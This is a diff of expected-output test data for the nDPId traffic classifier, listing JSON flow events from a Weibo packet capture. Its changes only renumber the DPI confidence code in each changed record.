@@ -200,16 +199,16 @@ 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -219,11 +218,11 @@ 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -233,10 +232,10 @@ 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} -00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00916{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 